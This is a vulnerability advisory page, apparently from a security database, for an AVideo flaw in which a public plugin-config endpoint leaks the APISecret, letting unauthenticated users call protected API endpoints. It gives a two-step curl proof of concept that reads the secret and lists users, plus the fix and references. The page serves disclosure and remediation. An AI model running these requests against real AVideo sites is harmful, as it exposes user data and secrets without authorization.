logo

Database

Improper authorization control for web services In wwbn/avideo

Description

AVideo Vulnerable to Exposure of Sensitive Information to an Unauthorized Actor and Missing Authorization

Summary

An unauthenticated user can read APISecret from objects/plugins.json.php and use it to call protected API endpoints (e.g. users_list) without logging in.

Details

objects/plugins.json.php is public and still exposes plugin object_data containing APISecret. That secret is accepted by plugin/API/get.json.php as authentication.

PoC

    Get plugin config (contains APISecret):

curl 'http://<host>/objects/plugins.json.php'
image

    Copy APISecret from response, then call API directly:

curl --get 'http://<host>/plugin/API/get.json.php' \
  --data-urlencode 'APIName=users_list' \
  --data-urlencode 'APISecret=<APISecret>' \
  --data-urlencode 'rowCount=3' \
  --data-urlencode 'current=1'
image

Impact

Unauthenticated disclosure of sensitive config (APISecret) leading to unauthorized access to protected API data.

Recommended fix

Requiring admin auth for full plugin inventory/config endpoint.

Mitigation

Update Impact

Minimal update. May introduce new vulnerabilities or breaking changes.

Ecosystem
Package
Affected version

Aliases

1. CVE-2026-438852. NVD-2026-438853. OSV-2026-438854. GHSA-xr49-f4rh-qcjf5. GCVE-2026-43885

References

1. https://github.com/WWBN/AVideo/security/advisories/GHSA-xr49-f4rh-qcjf2. https://github.com/WWBN/AVideo/commit/1c36f229d0a103528fb9f64d0a1cc0e1e8f5999b

Does your application use this vulnerable software?

During the free trial, our tools assess your application, identify vulnerabilities, and provide recommendations for their remediation.